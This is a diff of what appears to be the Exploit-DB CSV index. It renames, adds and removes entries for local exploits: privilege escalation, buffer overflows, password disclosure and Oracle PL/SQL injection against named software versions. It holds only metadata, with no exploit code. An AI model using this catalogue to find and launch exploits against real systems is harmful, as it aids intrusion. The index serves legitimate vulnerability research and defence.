@@ -5855,16 +5871,16 @@ id,file,description,date,author,platform,type,port 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Overflow",2004-08-13,pi3,linux,local,0 -395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD - 'ftp'",2002-01-01,Teso,bsd,local,0 +394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow",2004-08-13,pi3,linux,local,0 +395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Overflow",2004-08-14,mandragore,windows,local,0 +396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Local Overflow",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 -403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local",2004-08-18,anonymous,windows,local,0 +405,platforms/linux/local/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,local,0 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Privilege Escalation",2001-01-01,sd,linux,local,0 417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 -466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - 
Local",2004-09-16,"Luiz Fernando Camargo",linux,local,0 +466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Overflow",2004-09-16,"Luiz Fernando Camargo",linux,local,0 469,platforms/linux/local/469.c,"CDRecord's ReadCD - Privilege Escalation",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",linux,local,0 476,platforms/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)",2004-09-23,CoKi,linux,local,0 @@ -5872,8 +5888,8 @@ id,file,description,date,author,platform,type,port 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,hp-ux,local,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 -560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local",2004-09-28,ATmaCA,windows,local,0 -579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local",2004-10-16,"Idan Nahoum",bsd,local,0 +560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,windows,local,0 +579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local acls Bypass",2004-10-16,"Idan Nahoum",bsd,local,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 591,platforms/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,linux,local,0 
@@ -5898,8 +5914,9 @@ id,file,description,date,author,platform,type,port 739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 -749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local",2005-01-11,"Cesar Cerrudo",windows,local,0 +749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",windows,local,0 756,platforms/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local (PoC)",2005-01-15,"Rafael Carrasco",linux,local,0 +758,platforms/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,osx,local,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,windows,local,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,linux,local,79 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation",2005-01-22,nemo,osx,local,0 
@@ -5908,15 +5925,15 @@ id,file,description,date,author,platform,type,port 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"ncpfs < 2.2.6 (Gentoo / Linux) - Privilege Escalation",2005-01-30,super,linux,local,0 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0 -791,platforms/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 +791,platforms/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,windows,local,0 -811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local",2005-02-10,Kozan,windows,local,0 -816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Not SUID Local",2005-02-13,lizard,linux,local,0 +811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Credential Recover",2005-02-10,Kozan,windows,local,0 +816,platforms/linux/local/816.c,"GNU a2ps - Anything to PostScript Not SUID Local Overflow",2005-02-13,lizard,linux,local,0 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Non SUID Local 
Shell",2005-09-13,Qnix,linux,local,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 @@ -5937,7 +5954,7 @@ id,file,description,date,author,platform,type,port 896,platforms/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 898,platforms/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,aix,local,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,windows,local,0 -912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local",2005-04-04,Kozan,windows,local,0 +912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,windows,local,0 913,platforms/linux/local/913.pl,"Aeon 0.2a - Local Linux (1)",2005-04-05,lammat,linux,local,0 914,platforms/linux/local/914.c,"Aeon 0.2a - Local Linux (2)",2005-04-05,patr0n,linux,local,0 918,platforms/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure",2005-04-06,Kozan,windows,local,0 
@@ -5965,7 +5982,7 @@ id,file,description,date,author,platform,type,port 974,platforms/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",linux,local,0 997,platforms/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Privilege Escalation",2005-05-17,newbug,linux,local,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,aix,local,0 -1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-05-25,Plugger,linux,local,0 +1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,linux,local,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1029,platforms/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Privilege Escalation",2005-06-04,Qnix,linux,local,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 
@@ -5976,7 +5993,7 @@ id,file,description,date,author,platform,type,port 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 1073,platforms/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 -1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure Local",2005-07-04,Kozan,windows,local,0 +1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0 
@@ -6008,7 +6025,7 @@ id,file,description,date,author,platform,type,port 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 -1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local",2005-12-07,c0ntex,solaris,local,0 +1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,solaris,local,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 
@@ -6083,7 +6100,7 @@ id,file,description,date,author,platform,type,port 2242,platforms/solaris/local/2242.sh,"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak",2006-08-22,"Marco Ivaldi",solaris,local,0 2264,platforms/windows/local/2264.html,"VMware 5.5.1 - 'ActiveX' Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0 -2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local",2006-09-01,"Andres Tarasco",windows,local,0 +2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor",2006-09-01,"Andres Tarasco",windows,local,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - 'Filename Handling' Buffer Overflow",2006-09-01,bratax,windows,local,0 2330,platforms/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 
@@ -6106,12 +6123,13 @@ id,file,description,date,author,platform,type,port 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0 -2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local",2006-10-29,Nanika,windows,local,0 +2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,windows,local,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 +2821,platforms/windows/local/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg 
Linares",windows,local,0 @@ -6146,8 +6164,8 @@ id,file,description,date,author,platform,type,port 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",windows,local,0 -3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local",2007-02-28,"Don Bailey",plan9,local,0 -3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 +3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Privilege Escalation",2007-02-28,"Don Bailey",plan9,local,0 +3384,platforms/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 3413,platforms/multiple/local/3413.php,"PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3414,platforms/multiple/local/3414.php,"PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 
@@ -6165,12 +6183,12 @@ id,file,description,date,author,platform,type,port 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - 'session_regenerate_id()' Double-Free",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free",2007-03-14,"Stefan Esser",linux,local,0 3488,platforms/windows/local/3488.php,"PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow",2007-03-15,rgod,windows,local,0 -3499,platforms/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local",2007-03-16,"Stefan Esser",linux,local,0 +3499,platforms/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow",2007-03-16,"Stefan Esser",linux,local,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow",2007-03-19,"Stefan Esser",osx,local,0 3525,platforms/linux/local/3525.php,"PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage",2007-03-20,"Stefan Esser",linux,local,0 3529,platforms/linux/local/3529.php,"PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage",2007-03-20,"Stefan Esser",linux,local,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - 'Unserialize()' Local Information Leak",2007-03-23,"Stefan Esser",multiple,local,0 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 
@@ -6181,7 +6199,7 @@ id,file,description,date,author,platform,type,port 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 +3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - 'setuid' Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local,0 3688,platforms/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 
@@ -6269,8 +6287,8 @@ id,file,description,date,author,platform,type,port 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 -4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 -4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 +4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local,0 +4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)",2008-01-28,sh2kerr,multiple,local,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM",2008-01-29,mu-b,windows,local,0 
@@ -6363,7 +6381,7 @@ id,file,description,date,author,platform,type,port 7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0 -7681,platforms/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments'",2009-01-06,"Paul Szabo",linux,local,0 +7681,platforms/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments' Code Execution",2009-01-06,"Paul Szabo",linux,local,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 
@@ -6389,7 +6407,7 @@ id,file,description,date,author,platform,type,port 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow",2009-02-04,LiquidWorm,windows,local,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 
@@ -6586,7 +6604,7 @@ id,file,description,date,author,platform,type,port 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer (SEH)",2009-08-25,hack4love,windows,local,0 9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,windows,local,0 -9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 +9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Credential Disclosure",2009-08-25,"Xia Shing Zee",multiple,local,0 9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0 9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0 9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0 
@@ -6644,7 +6662,7 @@ id,file,description,date,author,platform,type,port 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,windows,local,0 -9990,platforms/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 +9990,platforms/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"Alleycode 2.21 - Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",windows,local,0 10009,platforms/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 
@@ -6728,7 +6746,7 @@ id,file,description,date,author,platform,type,port 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Overflow (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0 -10920,platforms/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Overflow",2010-01-02,"fl0 fl0w",windows,local,0 +10920,platforms/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 
@@ -6802,8 +6820,9 @@ id,file,description,date,author,platform,type,port 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",windows,local,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - '.wav' Stack Buffer Overflow",2010-03-31,mr_me,windows,local,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 +11987,platforms/windows/local/11987.txt,"Adobe Reader - Escape From '.PDF' Execute Embedded Executable",2010-03-31,"Didier Stevens",windows,local,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 -12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav'",2010-04-02,"Richard 